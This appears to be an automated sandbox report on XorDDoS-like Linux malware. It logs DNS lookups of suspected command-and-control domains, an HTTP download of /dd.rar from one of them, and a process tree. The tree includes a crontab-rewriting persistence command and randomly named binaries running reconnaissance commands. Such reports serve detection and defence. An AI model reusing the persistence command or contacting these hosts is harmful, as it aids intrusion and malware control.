                                                                                                                                                Mar 14, 2022 21:21:23.622210026 CET8.8.8.8192.168.2.230xeb81No error (0)www1.gggatat456.com54.36.15.99A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:23.667179108 CET8.8.8.8192.168.2.230x4e5bName error (3)p5.dddgata789.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:23.685904980 CET8.8.4.4192.168.2.230x797fName error (3)p5.dddgata789.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:23.704147100 CET8.8.8.8192.168.2.230x4e42No error (0)ppp.xxxatat456.com79.137.1.132A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:23.704147100 CET8.8.8.8192.168.2.230x4e42No error (0)ppp.xxxatat456.com46.105.84.188A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:23.704147100 CET8.8.8.8192.168.2.230x4e42No error (0)ppp.xxxatat456.com54.36.15.98A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:23.704147100 CET8.8.8.8192.168.2.230x4e42No error (0)ppp.xxxatat456.com79.137.1.134A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:23.704147100 CET8.8.8.8192.168.2.230x4e42No error (0)ppp.xxxatat456.com46.105.84.190A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:23.704147100 CET8.8.8.8192.168.2.230x4e42No error (0)ppp.xxxatat456.com54.36.15.96A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:28.727509975 CET8.8.8.8192.168.2.230x61b9No error (0)ppp.gggatat456.com54.36.145.106A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:28.727509975 CET8.8.8.8192.168.2.230x61b9No error (0)ppp.gggatat456.com54.36.15.97A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:28.727509975 CET8.8.8.8192.168.2.230x61b9No error (0)ppp.gggatat456.com176.31.91.137A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:28.727509975 CET8.8.8.8192.168.2.230x61b9No error (0)ppp.gggatat456.com79.137.1.133A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:28.727509975 CET8.8.8.8192.168.2.230x61b9No error (0)ppp.gggatat456.com54.36.15.99A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:28.727509975 CET8.8.8.8192.168.2.230x61b9No error (0)ppp.gggatat456.com54.36.145.104A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:33.788367033 CET8.8.8.8192.168.2.230x5786Name error (3)p5.dddgata789.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:33.807801008 CET8.8.4.4192.168.2.230xc987Name error (3)p5.dddgata789.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:33.826148987 CET8.8.8.8192.168.2.230xd172No error (0)ppp.xxxatat456.com46.105.84.190A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:33.826148987 CET8.8.8.8192.168.2.230xd172No error (0)ppp.xxxatat456.com46.105.84.188A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:33.826148987 CET8.8.8.8192.168.2.230xd172No error (0)ppp.xxxatat456.com79.137.1.134A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:33.826148987 CET8.8.8.8192.168.2.230xd172No error (0)ppp.xxxatat456.com54.36.15.96A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:33.826148987 CET8.8.8.8192.168.2.230xd172No error (0)ppp.xxxatat456.com79.137.1.132A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:33.826148987 CET8.8.8.8192.168.2.230xd172No error (0)ppp.xxxatat456.com54.36.15.98A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:38.848433971 CET8.8.8.8192.168.2.230xcffcNo error (0)ppp.gggatat456.com176.31.91.137A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:38.848433971 CET8.8.8.8192.168.2.230xcffcNo error (0)ppp.gggatat456.com54.36.145.106A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:38.848433971 CET8.8.8.8192.168.2.230xcffcNo error (0)ppp.gggatat456.com54.36.145.104A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:38.848433971 CET8.8.8.8192.168.2.230xcffcNo error (0)ppp.gggatat456.com79.137.1.133A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:38.848433971 CET8.8.8.8192.168.2.230xcffcNo error (0)ppp.gggatat456.com54.36.15.99A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:38.848433971 CET8.8.8.8192.168.2.230xcffcNo error (0)ppp.gggatat456.com54.36.15.97A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:43.909188032 CET8.8.8.8192.168.2.230x3993Name error (3)p5.dddgata789.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:43.926388979 CET8.8.4.4192.168.2.230x51e0Name error (3)p5.dddgata789.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:43.944708109 CET8.8.8.8192.168.2.230x6b01No error (0)ppp.xxxatat456.com79.137.1.132A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:43.944708109 CET8.8.8.8192.168.2.230x6b01No error (0)ppp.xxxatat456.com46.105.84.188A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:43.944708109 CET8.8.8.8192.168.2.230x6b01No error (0)ppp.xxxatat456.com54.36.15.98A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:43.944708109 CET8.8.8.8192.168.2.230x6b01No error (0)ppp.xxxatat456.com79.137.1.134A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:43.944708109 CET8.8.8.8192.168.2.230x6b01No error (0)ppp.xxxatat456.com46.105.84.190A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:43.944708109 CET8.8.8.8192.168.2.230x6b01No error (0)ppp.xxxatat456.com54.36.15.96A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:48.968261957 CET8.8.8.8192.168.2.230x4c64No error (0)ppp.gggatat456.com54.36.15.99A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:48.968261957 CET8.8.8.8192.168.2.230x4c64No error (0)ppp.gggatat456.com176.31.91.137A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:48.968261957 CET8.8.8.8192.168.2.230x4c64No error (0)ppp.gggatat456.com54.36.145.106A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:48.968261957 CET8.8.8.8192.168.2.230x4c64No error (0)ppp.gggatat456.com79.137.1.133A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:48.968261957 CET8.8.8.8192.168.2.230x4c64No error (0)ppp.gggatat456.com54.36.145.104A (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:48.968261957 CET8.8.8.8192.168.2.230x4c64No error (0)ppp.gggatat456.com54.36.15.97A (IP address)IN (0x0001)

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • www1.gggatat456.com

                                                                                                                                                HTTP Packets

                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                0192.168.2.235765254.36.15.9980
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Mar 14, 2022 21:21:23.655167103 CET1OUTGET /dd.rar HTTP/1.1
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Language: zh-cn
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
                                                                                                                                                Host: www1.gggatat456.com
                                                                                                                                                Connection: Keep-Alive


                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Start time:21:21:22
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:/tmp/0Xorddos.o
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:22
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:22
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:22
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:22
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:22
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:22
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/sbin/update-rc.d
                                                                                                                                                Arguments:update-rc.d 0Xorddos.o defaults
                                                                                                                                                File size:3478464 bytes
                                                                                                                                                MD5 hash:16a21f464119ea7fad1d3660de963637

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:22
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/sbin/update-rc.d
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:3478464 bytes
                                                                                                                                                MD5 hash:16a21f464119ea7fad1d3660de963637

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:22
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/bin/systemctl
                                                                                                                                                Arguments:systemctl daemon-reload
                                                                                                                                                File size:996584 bytes
                                                                                                                                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:22
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:22
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/bin/sh
                                                                                                                                                Arguments:sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"
                                                                                                                                                File size:129816 bytes
                                                                                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:22
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/bin/sh
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:129816 bytes
                                                                                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:22
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/bin/sed
                                                                                                                                                Arguments:sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab
                                                                                                                                                File size:121288 bytes
                                                                                                                                                MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:28
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:28
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:28
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/uqxezzsakx
                                                                                                                                                Arguments:/usr/bin/uqxezzsakx pwd 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:67365f9c1f2b194742925772fc9232ab

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:28
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/uqxezzsakx
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:67365f9c1f2b194742925772fc9232ab

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:28
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:28
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:28
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/uqxezzsakx
                                                                                                                                                Arguments:/usr/bin/uqxezzsakx "echo \"find\"" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:67365f9c1f2b194742925772fc9232ab

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:28
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/uqxezzsakx
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:67365f9c1f2b194742925772fc9232ab

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:28
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:28
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:29
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/uqxezzsakx
                                                                                                                                                Arguments:/usr/bin/uqxezzsakx "netstat -antop" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:67365f9c1f2b194742925772fc9232ab

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:29
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/uqxezzsakx
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:67365f9c1f2b194742925772fc9232ab

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:29
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:29
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:29
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/uqxezzsakx
                                                                                                                                                Arguments:/usr/bin/uqxezzsakx sh 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:67365f9c1f2b194742925772fc9232ab

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:29
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/uqxezzsakx
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:67365f9c1f2b194742925772fc9232ab

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:29
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:29
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:29
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/uqxezzsakx
                                                                                                                                                Arguments:/usr/bin/uqxezzsakx "sleep 1" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:67365f9c1f2b194742925772fc9232ab

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:29
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/uqxezzsakx
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:67365f9c1f2b194742925772fc9232ab

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:34
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:34
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:34
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cukrqcagnz
                                                                                                                                                Arguments:/usr/bin/cukrqcagnz who 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:c8d0992125712b7648ce9d7c261decea

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:34
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cukrqcagnz
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:c8d0992125712b7648ce9d7c261decea

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:34
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:34
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:34
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cukrqcagnz
                                                                                                                                                Arguments:/usr/bin/cukrqcagnz "ifconfig eth0" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:c8d0992125712b7648ce9d7c261decea

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:34
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cukrqcagnz
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:c8d0992125712b7648ce9d7c261decea

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:34
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:34
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:34
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cukrqcagnz
                                                                                                                                                Arguments:/usr/bin/cukrqcagnz "netstat -antop" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:c8d0992125712b7648ce9d7c261decea

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:34
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cukrqcagnz
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:c8d0992125712b7648ce9d7c261decea

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:34
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:34
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:34
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cukrqcagnz
                                                                                                                                                Arguments:/usr/bin/cukrqcagnz pwd 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:c8d0992125712b7648ce9d7c261decea

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:35
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cukrqcagnz
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:c8d0992125712b7648ce9d7c261decea

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:35
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:35
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:35
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cukrqcagnz
                                                                                                                                                Arguments:/usr/bin/cukrqcagnz "sleep 1" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:c8d0992125712b7648ce9d7c261decea

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:35
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cukrqcagnz
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:c8d0992125712b7648ce9d7c261decea

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:40
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:40
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:40
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/ysrkbnorkl
                                                                                                                                                Arguments:/usr/bin/ysrkbnorkl gnome-terminal 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:4d2e235cead4f0439bc635f5a18f4bf4

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:40
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/ysrkbnorkl
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:4d2e235cead4f0439bc635f5a18f4bf4

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:40
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:40
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:40
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/ysrkbnorkl
                                                                                                                                                Arguments:/usr/bin/ysrkbnorkl "ps -ef" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:4d2e235cead4f0439bc635f5a18f4bf4

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:41
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/ysrkbnorkl
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:4d2e235cead4f0439bc635f5a18f4bf4

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:40
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:40
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
